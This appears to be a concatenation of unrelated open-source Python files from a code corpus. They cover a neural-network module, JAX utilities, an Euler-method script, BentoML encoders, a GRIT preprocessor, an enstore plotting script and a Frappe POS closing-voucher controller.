        self.decoder = Decoder([1024, 512, 256, 128, 64])
        self.phrase_encoder = PhraseModel([64, 128, 256, 512, 1024])
        self.refiner = Refiner()
        self.apply(weights_init)
    def forward(self, note, pre_note, phrase, position, is_train=True):
        # Training: encode current and previous note, decode conditioned on
        # the phrase feature and position, refine, and return intermediates
        # for the loss. Inference: `note` is passed straight to the decoder
        # as the latent code — NOTE(review): confirm callers supply a latent
        # (not a raw note) in the is_train=False branch.
        if is_train:
            phrase_feature = self.phrase_encoder(phrase)
            z = self.encoder(note)
            pre_z = self.encoder(pre_note)
            gen_note = self.decoder(z, pre_z, phrase_feature, position)
            refined_gen_note = self.refiner(gen_note)
            return refined_gen_note, z, pre_z, phrase_feature
        else:
            phrase_feature = self.phrase_encoder(phrase)
            pre_z = self.encoder(pre_note)
            gen_note = self.decoder(note, pre_z, phrase_feature, position)
            return self.refiner(gen_note)
| StarcoderdataPython |
1889995 | <filename>inst/test_module.py
def f1(a=3, type="linear"):
"""
Initialize the model.
Parameters
----------
a : int, optional
Description for a.
Defaults to 3.
type : str, optional
Type of algorithm (default: "linear")
"linear" - linear model
"nonlinear" - nonlinear model
Returns
-------
values : array-like
Section1
-----------
Just a placeholder here.
"""
return a
| StarcoderdataPython |
9727334 | <reponame>iamlemec/valjax
from operator import mul
from itertools import accumulate
from collections import OrderedDict
from inspect import signature
import toml
import jax
import jax.numpy as np
import jax.tree_util as tree
##
## indexing tricks
##
def get_strides(shape):
    """Row-major (C-order) strides for ``shape``, measured in elements.

    >>> get_strides((2, 3, 4))
    (12, 4, 1)
    """
    strides = [1]
    for dim in reversed(shape[1:]):
        strides.append(strides[-1] * dim)
    return tuple(reversed(strides))
# index: [N, K] matrix or tuple of K [N] vectors
def ravel_index(index, shape):
    """Flatten multi-dimensional indices into linear row-major offsets."""
    flat_idx = np.stack(index, axis=-1)
    strides = np.array(get_strides(shape))
    return np.dot(flat_idx, strides)
def ensure_tuple(x):
    """Wrap ``x`` in a 1-tuple unless it is already exactly a tuple or list.

    Exact-type check is deliberate: subclasses (e.g. namedtuples) are wrapped.
    """
    return x if type(x) in (tuple, list) else (x,)
##
## special functions
##
# classic bounded smoothstep
def smoothstep(x):
    """Hermite smoothstep: 0 for x <= 0, 1 for x >= 1, 3x^2 - 2x^3 between."""
    inside = 3 * x ** 2 - 2 * x ** 3
    return np.where(x > 0, np.where(x < 1, inside, 1), 0)
##
## parameters
##
# (-∞,∞) → (-∞,∞)
def ident(x):
return x
# (-∞,∞) → (0,1)
def logit(x):
    """Sigmoid: map the real line into (0, 1)."""
    exp_neg = np.exp(-x)
    return 1 / (1 + exp_neg)
# (0,1) → (-∞,∞)
def rlogit(x):
    """Inverse sigmoid (log-odds): map (0, 1) onto the real line."""
    odds = x / (1 - x)
    return np.log(odds)
# returns encode/decode pair
def spec_funcs(s):
    """Translate a spec name into an (encode, decode) function pair;
    anything that is not a recognised name is passed through unchanged."""
    if s == 'ident':
        return ident, ident
    if s == 'log':
        return np.log, np.exp
    if s == 'logit':
        return rlogit, logit
    return s
def argpos(fun, arg):
    """Resolve ``arg`` — a parameter name or a (possibly negative) index —
    to a non-negative position in ``fun``'s signature.

    Raises:
        TypeError: if ``arg`` is neither str nor int (previously this fell
            through and raised an opaque UnboundLocalError).
        ValueError: if a name is not among the parameters.
    """
    sig = signature(fun)
    # Exact type checks kept deliberately (e.g. bool is not accepted as int).
    if type(arg) is str:
        return list(sig.parameters).index(arg)
    if type(arg) is int:
        n = len(sig.parameters)
        return arg + n if arg < 0 else arg
    raise TypeError(
        "arg must be a parameter name (str) or index (int), got %s"
        % type(arg).__name__
    )
# encode: map from true space to free space
# decode: map from free space to true space
class Spec:
    """Per-leaf parameter transforms over a pytree of specs.

    ``spec`` mirrors the structure of the values being transformed; each leaf
    is a name understood by spec_funcs (or an (encode, decode) pair already).
    """
    def __init__(self, spec):
        # Resolve each leaf spec into its (encode, decode) pair.
        self.spec = tree.tree_map(spec_funcs, spec)
    def encode(self, x):
        """Map values from true space to free space, leaf by leaf."""
        return tree.tree_map(lambda v, s: s[0](v), x, self.spec)
    def decode(self, x):
        """Map values from free space back to true space, leaf by leaf."""
        return tree.tree_map(lambda v, s: s[1](v), x, self.spec)
    def decoder(self, fun0, arg=0):
        """Wrap ``fun0`` so the argument at position/name ``arg`` is decoded
        before the call; other arguments pass through untouched."""
        pos = argpos(fun0, arg)
        def fun1(*args, **kwargs):
            # Lazily decode only the targeted positional argument.
            args1 = (
                self.decode(a) if i == pos else a for i, a in enumerate(args)
            )
            return fun0(*args1, **kwargs)
        return fun1
    def decodify(self, fun=None, arg=0):
        """Decorator form of ``decoder``; usable bare or with arguments."""
        if fun is None:
            def decor(fun0):
                return self.decoder(fun0, arg)
            return decor
        else:
            return self.decoder(fun, arg)
##
## function tools
##
def partial(fun, *args, argnums=None):
    """Bind ``args`` to ``fun`` at the positions given by ``argnums``
    (default: the leading positions), returning a function of the remaining
    positional arguments plus any keyword arguments.

    NOTE: deliberately shadows ``functools.partial`` to support binding at
    arbitrary argument positions.
    """
    nargs = len(args)
    if argnums is None:
        argnums = list(range(nargs))
    elif type(argnums) is int:
        argnums = [argnums]
    assert nargs == len(argnums)
    bound = dict(zip(argnums, args))

    def fun1(*args1, **kwargs1):
        ntot = nargs + len(args1)
        # BUG FIX: the original referenced `idx1` inside its own comprehension
        # (NameError at call time) and built `args2` as a single-element list,
        # missing the loop over all positions.
        free = [i for i in range(ntot) if i not in bound]
        slot = {pos: k for k, pos in enumerate(free)}
        args2 = [bound[i] if i in bound else args1[slot[i]] for i in range(ntot)]
        return fun(*args2, **kwargs1)

    return fun1
| StarcoderdataPython |
3364764 | <filename>Lecture_4_Tasks.py
"""Euler Method for the equation dy/dx = -y"""
import numpy as np
import matplotlib.pyplot as plt
import math as m
# Integration setup for dy/dx = -y with y(0) = 1 over [0, 1].
x_initial = 0
y_initial = 1
x_final = 1
h = 0.02  # step size
step = m.ceil(x_final/h)  # number of Euler steps
y_euler = []
x_euler = []
# Seed the trajectories with the initial condition.
y_euler.append(y_initial)
x_euler.append(x_initial)
def equation(y, x):
    """Right-hand side of the ODE dy/dx = -y.

    ``x`` is unused but kept for the standard f(y, x) solver signature.
    """
    decay = -1
    return decay * y
# Forward Euler: x_{i+1} = x_i + h, y_{i+1} = y_i + h * f(y_i, x_i).
for i in range(step):
    element= x_euler[i] + h
    x_euler.append(element)
    slope = equation(y_euler[i],x_euler[i])
    element_2 = y_euler[i] + h*slope
    y_euler.append(element_2)
# Plot the numerical solution (should approximate exp(-x)).
plt.plot(x_euler,y_euler)
plt.show()
| StarcoderdataPython |
3547206 | <reponame>Shumpei-Kikuta/BentoML
import gzip
import json
import os
from bentoml.types import HTTPRequest, InferenceTask
TF_B64_KEY = "b64"
class B64JsonEncoder(json.JSONEncoder):
""" Special json encoder for numpy types """
def default(self, o): # pylint: disable=method-hidden
import base64
if isinstance(o, bytes):
try:
return o.decode('utf-8')
except UnicodeDecodeError:
return {TF_B64_KEY: base64.b64encode(o).decode("utf-8")}
try:
return super(B64JsonEncoder, self).default(o)
except (TypeError, OverflowError):
return {"unknown_obj": str(o)}
class NumpyJsonEncoder(B64JsonEncoder):
    """JSON encoder that additionally understands numpy scalars and arrays."""

    def default(self, o):  # pylint: disable=method-hidden
        import numpy as np

        if isinstance(o, np.generic):
            # numpy scalar -> native Python scalar
            return o.item()
        if isinstance(o, np.ndarray):
            # ndarray -> (nested) Python list
            return o.tolist()
        return super().default(o)
class TfTensorJsonEncoder(NumpyJsonEncoder):
    """JSON encoder that additionally converts TensorFlow tensors."""
    def default(self, o):  # pylint: disable=method-hidden
        import tensorflow as tf
        # Tensor -> ndarray or object
        if isinstance(o, tf.Tensor):
            if tf.__version__.startswith("1."):
                # TF1 tensors need a session context before .numpy() works.
                with tf.compat.v1.Session():
                    return o.numpy()
            else:
                return o.numpy()
        # Fall through to numpy/bytes handling in the parent encoders.
        return super(TfTensorJsonEncoder, self).default(o)
def concat_list(lst, batch_flags=None):
    """Flatten a list of entries into one flat list plus, per entry, the
    slice (batch entry) or index (scalar entry) locating it; ``None``
    entries map to ``None``.

    >>> lst = [
        [1],
        [1, 2],
        [1, 2, 3],
        None,
        ]
    >>> concat_list(lst)
    [1, 1, 2, 1, 2, 3], [slice(0, 1), slice(1, 3), slice(3, 6), None]
    """
    slices = [slice(0)] * len(lst)
    flat = []
    cursor = 0
    for i, entry in enumerate(lst):
        if entry is None:
            slices[i] = None
            continue
        if batch_flags is None or batch_flags[i]:
            # Batch entry: splice its items in and record their slice.
            count = 0
            for item in entry:
                flat.append(item)
                count += 1
            slices[i] = slice(cursor, cursor + count)
            cursor += count
        else:
            # Scalar entry: stored whole, located by a plain index.
            flat.append(entry)
            slices[i] = cursor
            cursor += 1
    return flat, slices
def check_file_extension(file_name, accept_ext_list):
    """Return True only when ``file_name`` has an extension contained in
    ``accept_ext_list`` (case-insensitive); False for empty names or an
    empty/None accept list."""
    if not file_name:
        return False
    extension = os.path.splitext(file_name)[1]
    return extension.lower() in (accept_ext_list or [])
def get_default_accept_image_formats():
    """With default bentoML config, this returns:
    ['.jpg', '.png', '.jpeg', '.tiff', '.webp', '.bmp']
    """
    # Local import — presumably to avoid a circular import at module load;
    # confirm against the bentoml package layout.
    from bentoml import config
    return [
        extension.strip()
        for extension in config("apiserver")
        .get("default_image_input_accept_file_extensions")
        .split(",")
    ]
def decompress_gzip_request(method):
    """Decorator: transparently gunzip a gzip-encoded HTTP request body
    before invoking ``method``; a malformed body yields a discarded task
    with HTTP 400."""
    def _method(self, req: HTTPRequest) -> InferenceTask:
        # https://tools.ietf.org/html/rfc7230#section-4.2.3
        if req.headers.content_encoding not in {"gzip", "x-gzip"}:
            return method(self, req)
        try:
            req.body = gzip.decompress(req.body)
        except OSError:
            return InferenceTask().discard(
                http_status=400, err_msg="Gzip decompression error"
            )
        # Body is now plain; drop the header so downstream sees it as such.
        req.headers.pop("content-encoding")
        return method(self, req)
    return _method
| StarcoderdataPython |
359772 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
''' Toolbar preprocessing code. Turns all IDS_COMMAND macros in the RC file
into simpler constructs that can be understood by GRIT. Also deals with
expansion of $lf; placeholders into the correct linefeed character.
'''
import preprocess_interface
from grit import lazy_re
class ToolbarPreProcessor(preprocess_interface.PreProcessor):
    ''' Toolbar PreProcessing class.

    Rewrites IDS_COMMAND(a, b) macros into IDS_COMMAND_a_b identifiers and
    expands $lf; placeholders into literal \\n escapes so GRIT can parse
    the RC file.
    '''
    # IDS_COMMAND(name, sub) with two identifier arguments.
    _IDS_COMMAND_MACRO = lazy_re.compile(
        r'(.*IDS_COMMAND)\s*\(([a-zA-Z0-9_]*)\s*,\s*([a-zA-Z0-9_]*)\)(.*)')
    _LINE_FEED_PH = lazy_re.compile(r'\$lf;')
    _PH_COMMENT = lazy_re.compile(r'PHRWR')
    _COMMENT = lazy_re.compile(r'^(\s*)//.*')
    def Process(self, rctext, rcpath):
        ''' Processes the data in rctext.
        Args:
          rctext: string containing the contents of the RC file being processed
          rcpath: the path used to access the file.
        Return:
          The processed text.
        '''
        ret = ''
        rclines = rctext.splitlines()
        for line in rclines:
            if self._LINE_FEED_PH.search(line):
                # Replace "$lf;" placeholder comments by an empty line.
                # this will not be put into the processed result
                if self._PH_COMMENT.search(line):
                    mm = self._COMMENT.search(line)
                    if mm:
                        line = '%s//' % mm.group(1)
                else:
                    # Replace $lf by the right linefeed character
                    line = self._LINE_FEED_PH.sub(r'\\n', line)
            # Deal with IDS_COMMAND_MACRO stuff
            mo = self._IDS_COMMAND_MACRO.search(line)
            if mo:
                line = '%s_%s_%s%s' % (mo.group(1), mo.group(2), mo.group(3), mo.group(4))
            ret += (line + '\n')
        return ret
| StarcoderdataPython |
6659298 | #!/usr/bin/env python
# $Id$
import sys
import popen2
import os
import string
import time
def generate_date():
d1 = None
for when in 'date --date "1 month ago" +"%b-%d-%y"','date +"%b-%d-%y"':
d = os.popen(when,'r')
dat=d.readlines()
d.close()
if d1 == None:
d1 = dat[0][:-1]
d1.upper()
else:
d2 = dat[0][:-1]
d2.upper()
print 'Generating burn-rate plots from', d1, ' to ',d2
return d1, d2
def get_stats(host, port, start_date=None, finish_date=None):
    """Run psql against the enstore DB on host:port, writing the
    write_protect_summary rows to write_tabs_<host>.report; an optional
    [start_date, finish_date] window restricts the query."""
    date_fmt = "'YY-MM-DD HH24:MI'"
    if start_date and finish_date:
        query_cmd='psql -h %s -p %s -o "write_tabs_%s.report" -c \
        "select to_char(date, %s),total, should, not_yet, done from write_protect_summary\
        where date(time) between date(%s%s%s) and date(%s%s%s) \
        and mb_user_write != 0 order by date desc;" enstore'
        pipeObj = popen2.Popen3(query_cmd%(host, port, host, date_fmt, "'", start_date, "'", "'", finish_date, "'"), 0, 0)
    else:
        query_cmd='psql -h %s -p %s -o "write_tabs_%s.report" -c \
        "select to_char(date, %s),total, should, not_yet, done from write_protect_summary\
        order by date desc;" enstore'
        pipeObj = popen2.Popen3(query_cmd%(host, port, host, date_fmt), 0, 0)
    if pipeObj is None:
        sys.exit(1)
    stat = pipeObj.wait()
    # NOTE(review): `stat` and `result` are collected but never used; the
    # function's real output is the report file psql writes via -o.
    result = pipeObj.fromchild.readlines() # result has returned string
def make_plot_file(host):
    """Convert write_tabs_<host>.report (psql '|'-separated output) into the
    gnuplot data file write_tabs_<host>, returning the (should, not_yet,
    done) counts from the most recent row (Python 2 script)."""
    f=open("write_tabs_%s.report"%(host,),'r')
    of=open("write_tabs_%s"%(host,),'w')
    l = f.readline()
    first = 1
    while 1:
        l = f.readline()
        if l:
            a = l.split('|')
            if len(a) == 5:
                if first:
                    # Remember the newest row's counts for the caller.
                    s,n,d = int(a[2]), int(a[3]), int(a[4])
                    first = 0
                # Rewrite column 5 as done + not_yet so the bars stack.
                a[4] = str(int(a[4][:-1])+int(a[3]))
                lo = string.join(a)
                of.write("%s\n"%(lo,))
        else:
            break
    # BUG FIX: close both handles so the gnuplot step reads flushed data
    # (the output file was previously left open and possibly unflushed).
    f.close()
    of.close()
    return s,n,d
def make_plot(host, should, not_done, done):
    """Emit a gnuplot script for the write-tab state of *host*, render it to
    PostScript/JPEG, and copy the results to the web server (Python 2)."""
    t = time.ctime(time.time())
    f = open("write_tabs_%s.gnuplot"%(host,),'w')
    f.write('set terminal postscript color solid\n')
    f.write('set output "write_tabs_%s.ps"\n' % (host,))
    f.write('set title "Write Tabs States for %s."\n'%(host,))
    f.write('set xlabel "Date (year-month-day)"\n')
    f.write('set timefmt "%Y-%m-%d"\n')
    f.write('set xdata time\n')
    #f.write('set size 1.5,1\n')
    f.write('set xrange [ : ]\n')
    f.write('set grid\n')
    f.write('set yrange [0: ]\n')
    f.write('set format x "%y-%m-%d"\n')
    f.write('set ylabel "# tapes that should have write tabs ON"\n')
    f.write('set label "Plotted %s " at graph .99,0 rotate font "Helvetica,10"\n' % (t,))
    f.write('set label "Should %s, Done %s(%3.1f%%), Not Done %s." at graph .05,.90\n' % (should, done, done*100./should, not_done))
    #f.write('plot "write_tabs_%s" using 1:10 t "ON" w impulses lw %s 3 1 using 1:8 t "OFF" w impulses lw %s 1 1\n'%
    #        (host, 20, 20))
    f.write('plot "write_tabs_%s" using 1:6 t "ON" w impulses lw %s lt 2, "write_tabs_%s" using 1:5 t "OFF" w impulses lw %s lt 1\n'%
            (host, 20, host, 20))
    #f.write('plot "write_tabs_%s" using 1:10 t "ON" w impulses lw %s 3 1\n'%(host, 20))
    f.close()
    # Render the script and produce full-size plus thumbnail JPEGs.
    for cmd in '/usr/bin/gnuplot write_tabs_%s.gnuplot' % (host,),\
        '/usr/X11R6/bin/convert -flatten -background lightgray -rotate 90 -modulate 80 write_tabs_%s.ps write_tabs_%s.jpg' % (host,host),\
        '/usr/X11R6/bin/convert -flatten -background lightgray -rotate 90 -geometry 120x120 -modulate 80 write_tabs_%s.ps write_tabs_%s_stamp.jpg' % (host,host):
        os.system(cmd)
    # Publish the rendered files to the web server.
    cmd = '$ENSTORE_DIR/sbin/enrcp *.ps *.jpg stkensrv2:/fnal/ups/prd/www_pages/enstore/write_tabs'
    os.system(cmd)
#d1, d2 = generate_date()
# Produce a plot for each storage host (full history, no date window).
for h in "stkensrv6", "d0ensrv6", "cdfensrv6":
    get_stats(h, 5432)
    should, not_done, done = make_plot_file(h)
    make_plot(h,should, not_done, done)
| StarcoderdataPython |
3352958 | <reponame>fderyckel/pos_bahrain<gh_stars>10-100
# -*- coding: utf-8 -*-
# pylint: disable=no-member,access-member-before-definition
# Copyright (c) 2018, 9t9it and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import json
import frappe
from frappe.utils import get_datetime, flt, cint
from frappe.model.document import Document
from toolz import merge, compose, pluck, excepts, first, unique, concatv, reduceby
from functools import partial
from pos_bahrain.utils import pick, sum_by
class POSClosingVoucher(Document):
    """Frappe doctype controller: closes a POS shift and summarises its
    invoices, returns, payments, taxes, employees and item groups."""
    def validate(self):
        """Reject a voucher whose period overlaps another submitted voucher
        for the same company/profile (and user, when one is set)."""
        clauses = concatv(
            [
                "docstatus = 1",
                "name != %(name)s",
                "company = %(company)s",
                "pos_profile = %(pos_profile)s",
                "period_from <= %(period_to)s",
                "period_to >= %(period_from)s",
            ],
            ["user = %(user)s"] if self.user else [],
        )
        existing = frappe.db.sql(
            """
                SELECT 1 FROM `tabPOS Closing Voucher` WHERE {clauses}
            """.format(
                clauses=" AND ".join(clauses)
            ),
            values={
                "name": self.name,
                "company": self.company,
                "pos_profile": self.pos_profile,
                "user": self.user,
                "period_from": get_datetime(self.period_from),
                "period_to": get_datetime(self.period_to),
            },
        )
        if existing:
            frappe.throw(
                "Another POS Closing Voucher already exists during this time frame."
            )
    def before_insert(self):
        # Default the period start to "now" when the user left it blank.
        if not self.period_from:
            self.period_from = get_datetime()
    def before_submit(self):
        """Finalize the period, rebuild the report tables and compute the
        closing amount from the default mode of payment."""
        if not self.period_to:
            self.period_to = get_datetime()
        self.set_report_details()
        # Collected amount of the default MOP (0 when there is none).
        get_default_collected = compose(
            lambda x: x.collected_amount if x else 0,
            excepts(StopIteration, first, lambda x: None),
            partial(filter, lambda x: cint(x.is_default) == 1),
        )
        self.closing_amount = self.opening_amount + get_default_collected(self.payments)
    def set_report_details(self):
        """Recompute every summary field and child table from the POS sales
        invoices, payments and taxes submitted within the period."""
        args = merge(
            pick(["user", "pos_profile", "company"], self.as_dict()),
            {
                "period_from": get_datetime(self.period_from),
                "period_to": get_datetime(self.period_to),
            },
        )
        sales, returns = _get_invoices(args)
        actual_payments, collection_payments = _get_payments(args)
        taxes = _get_taxes(args)
        def make_invoice(invoice):
            # Child-table row for the invoices/returns tables.
            return merge(
                pick(["grand_total", "paid_amount", "change_amount"], invoice),
                {
                    "invoice": invoice.name,
                    "total_quantity": invoice.pos_total_qty,
                    "sales_employee": invoice.pb_sales_employee,
                },
            )
        def make_payment(payment):
            # Child-table row for the payments table; MOP-currency amounts
            # are converted via the implied rate when one is available.
            mop_conversion_rate = (
                payment.amount / payment.mop_amount if payment.mop_amount else 1
            )
            # The default MOP absorbs the change given back to customers.
            expected_amount = (
                payment.amount - sum_by("change_amount", sales)
                if payment.is_default
                else (payment.mop_amount or payment.amount)
            )
            return merge(
                pick(["is_default", "mode_of_payment", "type"], payment),
                {
                    "mop_conversion_rate": mop_conversion_rate,
                    "collected_amount": expected_amount,
                    "expected_amount": expected_amount,
                    "difference_amount": 0,
                    "mop_currency": payment.mop_currency
                    or frappe.defaults.get_global_default("currency"),
                    "base_collected_amount": expected_amount * flt(mop_conversion_rate),
                },
            )
        make_tax = partial(pick, ["rate", "tax_amount"])
        get_employees = partial(
            pick, ["pb_sales_employee", "pb_sales_employee_name", "grand_total"]
        )
        # Aggregate totals across sales and returns.
        self.returns_total = sum_by("grand_total", returns)
        self.returns_net_total = sum_by("net_total", returns)
        self.grand_total = sum_by("grand_total", sales + returns)
        self.net_total = sum_by("net_total", sales + returns)
        self.outstanding_total = sum_by("outstanding_amount", sales)
        self.total_invoices = len(sales + returns)
        self.average_sales = sum_by("net_total", sales) / len(sales) if sales else 0
        self.total_quantity = sum_by("pos_total_qty", sales)
        self.returns_quantity = -sum_by("pos_total_qty", returns)
        self.tax_total = sum_by("tax_amount", taxes)
        self.discount_total = sum_by("discount_amount", sales)
        self.change_total = sum_by("change_amount", sales)
        self.total_collected = (
            sum_by("amount", actual_payments)
            + sum_by("amount", collection_payments)
            - self.change_total
        )
        self.invoices = []
        for invoice in sales:
            self.append("invoices", make_invoice(invoice))
        self.returns = []
        for invoice in returns:
            self.append("returns", make_invoice(invoice))
        # Snapshot user-edited collected amounts before rebuilding the table.
        existing_payments = self.payments
        def get_form_collected(mop):
            # Carry over a manually adjusted collected amount for this MOP.
            existing = compose(
                excepts(StopIteration, first, lambda x: None),
                partial(filter, lambda x: x.mode_of_payment == mop),
            )(existing_payments)
            if not existing or existing.collected_amount == existing.expected_amount:
                return {}
            return {"collected_amount": existing.collected_amount}
        self.payments = []
        for payment in actual_payments:
            self.append(
                "payments",
                merge(
                    make_payment(payment), get_form_collected(payment.mode_of_payment)
                ),
            )
        for payment in collection_payments:
            collected_payment = merge(
                make_payment(payment), get_form_collected(payment.mode_of_payment)
            )
            # NOTE(review): this rebinds `existing_payments`, which
            # get_form_collected closes over — on later iterations the
            # closure filters the rebound list, not the original snapshot;
            # confirm that is intended.
            existing_payments = list(
                filter(
                    lambda x: x.mode_of_payment == collected_payment["mode_of_payment"],
                    self.payments,
                )
            )
            if existing_payments:
                # Same MOP already present: merge amounts into that row.
                existing_payment = first(existing_payments)
                for field in [
                    "expected_amount",
                    "collected_amount",
                    "difference_amount",
                    "base_collected_amount",
                ]:
                    existing_payment.set(
                        field,
                        sum(
                            [
                                existing_payment.get(field),
                                collected_payment.get(field, 0),
                            ]
                        ),
                    )
            else:
                self.append("payments", collected_payment)
        self.taxes = []
        for tax in taxes:
            self.append("taxes", make_tax(tax))
        self.employees = []
        employee_with_sales = compose(list, partial(map, get_employees))(sales)
        employees = compose(
            list, unique, partial(map, lambda x: x["pb_sales_employee"])
        )(employee_with_sales)
        for employee in employees:
            sales_employee_name = compose(
                first, partial(filter, lambda x: x["pb_sales_employee"] == employee)
            )(employee_with_sales)["pb_sales_employee_name"]
            # NOTE(review): `sales` is rebound here, clobbering the invoice
            # list for the rest of the loop/method — harmless today because
            # nothing below uses the original, but fragile.
            sales = compose(
                list,
                partial(map, lambda x: x["grand_total"]),
                partial(filter, lambda x: x["pb_sales_employee"] == employee),
            )(employee_with_sales)
            self.append(
                "employees",
                {
                    "sales_employee": employee,
                    "sales_employee_name": sales_employee_name,
                    "invoices_count": len(sales),
                    "sales_total": sum(sales),
                },
            )
        self.item_groups = []
        for row in _get_item_groups(args):
            self.append("item_groups", row)
def _get_clauses(args):
    """Build the WHERE clause shared by the POS closing voucher queries;
    filters by invoice owner only when a user is supplied."""
    conditions = [
        "si.docstatus = 1",
        "si.is_pos = 1",
        "si.pos_profile = %(pos_profile)s",
        "si.company = %(company)s",
        "TIMESTAMP(si.posting_date, si.posting_time) BETWEEN %(period_from)s AND %(period_to)s",  # noqa
    ]
    if args.get("user"):
        conditions.append("si.owner = %(user)s")
    return " AND ".join(conditions)
def _get_invoices(args):
    """Fetch submitted POS Sales Invoices posted in the closing period.

    Returns a ``(sales, returns)`` pair of row lists: ``sales`` holds regular
    invoices (``is_return != 1``) and ``returns`` holds credit notes
    (``is_return = 1``). Monetary columns are the base-currency fields.
    ``args`` supplies the bind parameters consumed by ``_get_clauses``.
    """
    sales = frappe.db.sql(
        """
        SELECT
            si.name AS name,
            si.pos_total_qty AS pos_total_qty,
            si.base_grand_total AS grand_total,
            si.base_net_total AS net_total,
            si.base_discount_amount AS discount_amount,
            si.outstanding_amount AS outstanding_amount,
            si.paid_amount AS paid_amount,
            si.change_amount AS change_amount,
            si.pb_sales_employee,
            si.pb_sales_employee_name
        FROM `tabSales Invoice` AS si
        WHERE {clauses} AND is_return != 1
        """.format(
            clauses=_get_clauses(args)
        ),
        values=args,
        as_dict=1,
    )
    # Same query for credit notes; note it deliberately omits
    # outstanding_amount (returns are expected to be settled immediately).
    returns = frappe.db.sql(
        """
        SELECT
            si.name AS name,
            si.pos_total_qty AS pos_total_qty,
            si.base_grand_total AS grand_total,
            si.base_net_total AS net_total,
            si.base_discount_amount AS discount_amount,
            si.paid_amount AS paid_amount,
            si.change_amount AS change_amount,
            si.pb_sales_employee,
            si.pb_sales_employee_name
        FROM `tabSales Invoice` As si
        WHERE {clauses} AND is_return = 1
        """.format(
            clauses=_get_clauses(args)
        ),
        values=args,
        as_dict=1,
    )
    return sales, returns
def _get_payments(args):
    """Collect payment totals for the closing period.

    Returns a ``(sales_payments, collection_payments)`` pair:
      * ``sales_payments``: per mode-of-payment totals taken directly from
        POS Sales Invoice Payment rows in the period.
      * ``collection_payments``: per mode-of-payment totals of submitted
        "Receive" Payment Entries created by the user in the period.
    Both lists are post-processed by ``_correct_mop_amounts`` with the POS
    profile's default mode of payment.
    """
    sales_payments = frappe.db.sql(
        """
        SELECT
            sip.mode_of_payment AS mode_of_payment,
            sip.type AS type,
            SUM(sip.base_amount) AS amount,
            sip.mop_currency AS mop_currency,
            SUM(sip.mop_amount) AS mop_amount
        FROM `tabSales Invoice Payment` AS sip
        LEFT JOIN `tabSales Invoice` AS si ON
            sip.parent = si.name
        WHERE sip.parenttype = 'Sales Invoice' AND {clauses}
        GROUP BY sip.mode_of_payment
        """.format(
            clauses=_get_clauses(args)
        ),
        values=args,
        as_dict=1,
    )
    # NOTE(review): sip.type and sip.mop_currency are selected without
    # aggregation under GROUP BY sip.mode_of_payment — this relies on a
    # permissive SQL mode (no ONLY_FULL_GROUP_BY); confirm against the
    # deployment's MariaDB/MySQL settings.
    # Default mode of payment configured on the POS Profile, or None when the
    # profile defines no default (excepts() swallows the StopIteration raised
    # by first() on an empty result).
    default_mop = compose(
        excepts(StopIteration, first, lambda __: None),
        partial(pluck, "mode_of_payment"),
        frappe.get_all,
    )(
        "Sales Invoice Payment",
        fields=["mode_of_payment"],
        filters={
            "parenttype": "POS Profile",
            "parent": args.get("pos_profile"),
            "default": 1,
        },
    )
    # NOTE(review): pb_posting_time looks like a custom field on Payment
    # Entry — confirm it exists wherever this report is installed.
    collection_payments = frappe.db.sql(
        """
        SELECT
            mode_of_payment,
            SUM(paid_amount) AS amount
        FROM `tabPayment Entry`
        WHERE docstatus = 1
        AND company = %(company)s
        AND owner = %(user)s
        AND payment_type = "Receive"
        AND TIMESTAMP(posting_date, pb_posting_time) BETWEEN %(period_from)s AND %(period_to)s
        GROUP BY mode_of_payment
        """,
        values=args,
        as_dict=1,
    )
    return (
        _correct_mop_amounts(sales_payments, default_mop),
        _correct_mop_amounts(collection_payments, default_mop),
    )
def _correct_mop_amounts(payments, default_mop):
    """
    Correct conversion_rate for MOPs using base currency.
    Required because conversion_rate is calculated as
        base_amount / mop_amount
    for MOPs using alternate currencies.

    Also flags the row matching *default_mop* with ``is_default = 1``.
    Returns a new list of ``frappe._dict`` rows; *payments* is not mutated.
    """
    # Names of all modes of payment that settle in the base currency.
    base_mops = [
        row["name"]
        for row in frappe.get_all("Mode of Payment", filters={"in_alt_currency": 0})
    ]
    base_currency = frappe.defaults.get_global_default("currency")

    def correct(payment):
        # Mark the profile default, and for base-currency MOPs force the
        # mop_* fields to mirror the base amount/currency.
        overrides = {"is_default": 1 if payment.mode_of_payment == default_mop else 0}
        if payment.mode_of_payment in base_mops:
            overrides["mop_amount"] = payment.base_amount
            overrides["mop_currency"] = base_currency
        return frappe._dict(merge(payment, overrides))

    return [correct(x) for x in payments]
def _get_taxes(args):
    """Sum invoice taxes in the closing period, grouped by tax rate.

    Returns rows of ``{rate, tax_amount}`` where ``tax_amount`` is the
    base-currency tax after discount, aggregated over all matching POS
    Sales Invoices.
    """
    taxes = frappe.db.sql(
        """
        SELECT
            stc.rate AS rate,
            SUM(stc.base_tax_amount_after_discount_amount) AS tax_amount
        FROM `tabSales Taxes and Charges` AS stc
        LEFT JOIN `tabSales Invoice` AS si ON
            stc.parent = si.name
        WHERE stc.parenttype = 'Sales Invoice' AND {clauses}
        GROUP BY stc.rate
        """.format(
            clauses=_get_clauses(args)
        ),
        values=args,
        as_dict=1,
    )
    return taxes
def _get_item_groups(args):
    """Aggregate POS invoice items of the closing period by item group.

    Returns a list of dicts, one per item group, each carrying the summed
    ``qty``, ``net_amount``, ``tax_amount`` and ``grand_total``.
    """

    def get_tax_rate(item_tax_rate):
        """Sum the per-tax-head rates stored in the JSON ``item_tax_rate``."""
        try:
            tax_rates = json.loads(item_tax_rate)
            return sum([v for k, v in tax_rates.items()])
        except TypeError:
            # BUG FIX: the original branch was a bare `0` with no `return`,
            # so rows without an item_tax_rate (None) made this function
            # return None, crashing the `rate * net_amount` multiplication
            # in set_tax_and_total below.
            return 0

    def set_tax_and_total(row):
        # Derive the row's tax from its serialized tax rates and add it to
        # the net amount to obtain the row's grand total.
        tax_amount = (
            get_tax_rate(row.get("item_tax_rate")) * row.get("net_amount") / 100
        )
        return merge(
            row,
            {
                "tax_amount": tax_amount,
                "grand_total": tax_amount + row.get("net_amount"),
            },
        )

    # Fold all invoice-item rows into per-item-group accumulators.
    groups = reduceby(
        "item_group",
        lambda a, x: {
            "qty": a.get("qty") + x.get("qty"),
            "net_amount": a.get("net_amount") + x.get("net_amount"),
            "tax_amount": a.get("tax_amount") + x.get("tax_amount"),
            "grand_total": a.get("grand_total") + x.get("grand_total"),
        },
        (
            set_tax_and_total(x)
            for x in frappe.db.sql(
                """
